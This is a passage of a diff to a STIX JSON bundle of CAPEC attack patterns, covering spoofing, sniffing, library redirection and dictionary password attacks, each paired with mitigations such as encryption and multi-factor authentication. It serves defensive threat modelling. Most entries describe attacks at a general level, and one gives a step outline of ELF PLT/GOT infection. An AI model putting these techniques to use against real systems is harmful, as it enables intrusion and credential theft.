"modified": "2019-09-30T00:00:00.000Z", "name": "coa-15-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Perform input validation for all remote content.", "type": "course-of-action", - "id": "course-of-action--973c207c-2784-4f0c-98e8-0ac062857549" + "id": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5807f0d2-8c05-45cd-928d-fb608c096e69", - "source_ref": "course-of-action--973c207c-2784-4f0c-98e8-0ac062857549", + "id": "relationship--f0562beb-5a29-416e-bdec-f1c183db6237", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b0fda5b8-6244-430f-a3df-ae981b83d4dd" + "target_ref": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-15-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use type conversions such as JDBC prepared statements.", "type": "course-of-action", - "id": "course-of-action--0d8c7207-83eb-4028-9d98-41504c2e2590" + "id": "course-of-action--f0bae5ab-7fc8-4817-922b-5879e4edca34" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0ae76593-899c-4621-89cb-bde954ea5e76", - "source_ref": "course-of-action--0d8c7207-83eb-4028-9d98-41504c2e2590", + "id": "relationship--3952c82d-c89f-4067-9788-6a3a29d3ef5b", + "source_ref": "course-of-action--f0bae5ab-7fc8-4817-922b-5879e4edca34", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b0fda5b8-6244-430f-a3df-ae981b83d4dd" + "target_ref": "attack-pattern--0e6d2797-eedc-4782-8e0c-eb9a682d2b54" }, { "name": "Collect Data from Common Resource Locations", "description": "An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -6344,15 +6399,16 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--6e97eea1-a8a9-40cf-9777-b64a0dff0f6b" + "id": "attack-pattern--fede6dfd-28fe-430b-8e83-3954bd33ad25" }, { "name": "Identity Spoofing", "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials. Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -6392,40 +6448,41 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--4dc63504-5969-4cc2-a676-b1200d872691" + "id": "attack-pattern--f44bd96f-9bc0-4343-b744-59a47d18a28d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-151-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Employ robust authentication processes (e.g., multi-factor authentication).", "type": "course-of-action", - "id": "course-of-action--9795f52e-8fea-4033-b883-d97f36a2271a" + "id": "course-of-action--ad1abb2c-832c-4bcf-bf0a-dd8768b9ed5a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--eefda4e1-b186-4ef1-b1be-fa39c7adf474", - "source_ref": "course-of-action--9795f52e-8fea-4033-b883-d97f36a2271a", + "id": "relationship--60a630e6-d81a-445a-9fba-4432985034eb", + "source_ref": "course-of-action--ad1abb2c-832c-4bcf-bf0a-dd8768b9ed5a", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4dc63504-5969-4cc2-a676-b1200d872691" + "target_ref": "attack-pattern--f44bd96f-9bc0-4343-b744-59a47d18a28d" }, { "name": "Input Data Manipulation", "description": "An attacker exploits a weakness in input validation by controlling the format, structure, and composition of data to an input-processing interface. By supplying input of a non-standard or unexpected form an attacker can adversely impact the security of the target. For example, using a different character encoding might cause dangerous text to be treated as safe text. Alternatively, the attacker may use certain flags, such as file extensions, to make a target application believe that provided data should be handled using a certain interpreter when the data is not actually of the appropriate type. This can lead to bypassing protection mechanisms, forcing the target to use specific components for input processing, or otherwise causing the user's data to be handled differently than might otherwise be expected. This attack differs from Variable Manipulation in that Variable Manipulation attempts to subvert the target's processing through the value of the input while Input Data Manipulation seeks to control how the input is processed.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -6450,15 +6507,16 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d151a35f-f42a-46ae-8604-231be13a5c63" + "id": "attack-pattern--ca2982ef-3471-481a-ae9d-96c968854e2b" }, { "name": "Resource Location Spoofing", "description": "An adversary deceives an application or user and convinces them to request a resource from an unintended location. By spoofing the location, the adversary can cause an alternate resource to be used, often one that the adversary controls and can be used to help them achieve their malicious goals.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -6484,43 +6542,44 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d1267244-07ec-4815-9ae3-bd3e1b19c6df" + "id": "attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-154-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Monitor network activity to detect any anomalous or unauthorized communication exchanges.", "type": "course-of-action", - "id": "course-of-action--ebf02dc6-27bb-40ef-903a-206f6d349499" + "id": "course-of-action--8903cc8e-8523-4ecc-898f-e840944d8343" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--17afa616-df71-4cfe-9c01-7a70c89e2ddf", - "source_ref": "course-of-action--ebf02dc6-27bb-40ef-903a-206f6d349499", + "id": "relationship--2d2380c2-85b1-4b31-a175-301f5d739afb", + "source_ref": "course-of-action--8903cc8e-8523-4ecc-898f-e840944d8343", "relationship_type": "mitigates", - "target_ref": "attack-pattern--d1267244-07ec-4815-9ae3-bd3e1b19c6df" + "target_ref": "attack-pattern--0db28437-bbb7-4654-afda-e51ac1c18f74" }, { "name": "Screen Temporary Files for Sensitive Information", "description": "An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -6543,18 +6602,19 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d48fe1fc-42f2-4429-90e0-734eae65a1b5" + "id": "attack-pattern--f2ee0774-b921-420d-b786-31d5156c671b" }, { "name": "Sniffing Attacks", - "description": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the information. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "description": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Man-In-The-Middle attacks (CAPEC-94), but are entirely passive. MITM attacks are predominantly active and often alter the content of the communications themselves.", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -6581,40 +6641,41 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--24a133b4-f852-473c-bcb8-e0657a2ded60" + "id": "attack-pattern--5f8ede88-b076-472c-b7e3-32b2a56e51e0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-157-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Encrypt sensitive information when transmitted on insecure mediums to prevent interception.", "type": "course-of-action", - "id": "course-of-action--a50fdd36-98b4-40ca-b610-2aaae12d317c" + "id": "course-of-action--0cc989fe-e338-41db-8c57-5824d3cc66ec" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--df7bc2dc-3ee1-44da-84ed-4747b5c9548f", - "source_ref": "course-of-action--a50fdd36-98b4-40ca-b610-2aaae12d317c", + "id": "relationship--a406c81b-ff0d-43ee-8744-d73583ca0d57", + "source_ref": "course-of-action--0cc989fe-e338-41db-8c57-5824d3cc66ec", "relationship_type": "mitigates", - "target_ref": "attack-pattern--24a133b4-f852-473c-bcb8-e0657a2ded60" + "target_ref": "attack-pattern--5f8ede88-b076-472c-b7e3-32b2a56e51e0" }, { "name": "Sniffing Network Traffic", "description": "In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -6648,65 +6709,66 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--4d6af3bb-97d1-423b-94b5-ab8330244571" + "id": "attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-158-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Obfuscate network traffic through encryption to prevent its readability by network sniffers.", "type": "course-of-action", - "id": "course-of-action--b7961831-288b-4ec4-a96c-3cf1a757f96b" + "id": "course-of-action--f9c65d00-bf25-4939-96ed-2eec4c4f7b8f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--41cd1bbb-4014-45f9-a5d3-eb1ca16b6986", - "source_ref": "course-of-action--b7961831-288b-4ec4-a96c-3cf1a757f96b", + "id": "relationship--c7bb5a65-1cfa-4368-99de-417b00375584", + "source_ref": "course-of-action--f9c65d00-bf25-4939-96ed-2eec4c4f7b8f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4d6af3bb-97d1-423b-94b5-ab8330244571" + "target_ref": "attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-158-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Employ appropriate levels of segmentation to your network in accordance with best practices.", "type": "course-of-action", - "id": "course-of-action--0c01c0a7-a7e1-47d1-b015-18a1e30f5a62" + "id": "course-of-action--bd93a4f0-efc9-4872-b258-f5ab4f5e1279" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f891617c-baa8-4637-99da-97a8205b1afb", - "source_ref": "course-of-action--0c01c0a7-a7e1-47d1-b015-18a1e30f5a62", + "id": "relationship--a430a05b-fd21-408e-9e44-d91dbf00b0f9", + "source_ref": "course-of-action--bd93a4f0-efc9-4872-b258-f5ab4f5e1279", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4d6af3bb-97d1-423b-94b5-ab8330244571" + "target_ref": "attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3" }, { "name": "Redirect Access to Libraries", "description": "An adversary exploits a weakness in the way an application searches for external libraries to manipulate the execution flow to point to an adversary supplied library or code base. This pattern of attack allows the adversary to compromise the application or server via the execution of unauthorized code. An application typically makes calls to functions that are a part of libraries external to the application. These libraries may be part of the operating system or they may be third party libraries. If an adversary can redirect an application's attempts to access these libraries to other libraries that the adversary supplies, the adversary will be able to force the targeted application to execute arbitrary code. This is especially dangerous if the targeted application has enhanced privileges. Access can be redirected through a number of techniques, including the use of symbolic links, search path modification, and relative path manipulation.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -6758,90 +6820,91 @@ "In this example, the attacker using ELF infection that redirects the Procedure Linkage Table (PLT) of an executable allowing redirection to be resident outside of the infected executable. The algorithm at the entry point code is as follows... \u2022 mark the text segment writeable \u2022 save the PLT(GOT) entry \u2022 replace the PLT(GOT) entry with the address of the new lib call The algorithm in the new library call is as follows... \u2022 do the payload of the new lib call \u2022 restore the original PLT(GOT) entry \u2022 call the lib call \u2022 save the PLT(GOT) entry again (if its changed) \u2022 replace the PLT(GOT) entry with the address of the new lib call" ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--0959ae92-d396-46de-a30a-66083f1e6b57" + "id": "attack-pattern--9b0c56c2-e1cf-4830-84ea-bba52af85033" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-159-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Restrict the permission to modify the entries in the configuration file.", "type": "course-of-action", - "id": "course-of-action--ed92f888-952d-44a5-b692-fbe607706547" + "id": "course-of-action--52384d4d-929b-4a22-8f18-9b8600cb66b3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--06b90051-8738-4ece-a492-089def11085c", - "source_ref": "course-of-action--ed92f888-952d-44a5-b692-fbe607706547", + "id": "relationship--e48f7336-578e-443a-8eda-088c9b4ccb4d", + "source_ref": "course-of-action--52384d4d-929b-4a22-8f18-9b8600cb66b3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0959ae92-d396-46de-a30a-66083f1e6b57" + "target_ref": "attack-pattern--9b0c56c2-e1cf-4830-84ea-bba52af85033" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-159-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Check the integrity of the dynamically linked libraries before use them.", "type": "course-of-action", - "id": "course-of-action--53c3be23-8161-4d02-9edc-01d6d1757985" + "id": "course-of-action--405d41ea-38ed-499b-85dd-36732f74cbac" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4e17860c-0a49-4062-9a7f-d4e530d2edca", - "source_ref": "course-of-action--53c3be23-8161-4d02-9edc-01d6d1757985", + "id": "relationship--166618a5-698e-411e-94e1-e1d879d19a95", + "source_ref": "course-of-action--405d41ea-38ed-499b-85dd-36732f74cbac", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0959ae92-d396-46de-a30a-66083f1e6b57" + "target_ref": "attack-pattern--9b0c56c2-e1cf-4830-84ea-bba52af85033" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-159-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use obfuscation and other techniques to prevent reverse engineering the libraries.", "type": "course-of-action", - "id": "course-of-action--a30afd3a-2b54-4878-b5c8-b12a21b4e623" + "id": "course-of-action--de9c19cf-2b80-4083-9bee-dd349ac4608d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d31f2293-2ffc-4268-8341-08807cd1c50c", - "source_ref": "course-of-action--a30afd3a-2b54-4878-b5c8-b12a21b4e623", + "id": "relationship--d5b57f85-6077-4111-b65e-7cd4e05b7a3d", + "source_ref": "course-of-action--de9c19cf-2b80-4083-9bee-dd349ac4608d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0959ae92-d396-46de-a30a-66083f1e6b57" + "target_ref": "attack-pattern--9b0c56c2-e1cf-4830-84ea-bba52af85033" }, { "name": "Dictionary-based Password Attack", "description": "An attacker tries each of the words in a dictionary as passwords to gain access to the system via some user's account. If the password chosen by the user was a word within the dictionary, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", @@ -6902,65 +6965,66 @@ "\n The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.\n Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.\n Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.See also: CVE-2003-1096" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--388e51bb-c597-4ac3-a38c-e1d1fd09a24f" + "id": "attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-16-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Create a strong password policy and ensure that your system enforces this policy.", "type": "course-of-action", - "id": "course-of-action--0ebc2d6e-092d-4ec7-bd0e-67a25f6056a1" + "id": "course-of-action--ddb89ff3-8582-425b-b2ff-fb3972d9861e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f9e87ba1-ee6a-46b2-9fa9-50719543cd9b", - "source_ref": "course-of-action--0ebc2d6e-092d-4ec7-bd0e-67a25f6056a1", + "id": "relationship--68e38613-42e8-420c-9417-6b3ee3bbc892", + "source_ref": "course-of-action--ddb89ff3-8582-425b-b2ff-fb3972d9861e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--388e51bb-c597-4ac3-a38c-e1d1fd09a24f" + "target_ref": "attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "name": "coa-16-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-02.", "type": "course-of-action", - "id": "course-of-action--ee734f89-5dc1-409b-88ec-4a213f05c039" + "id": 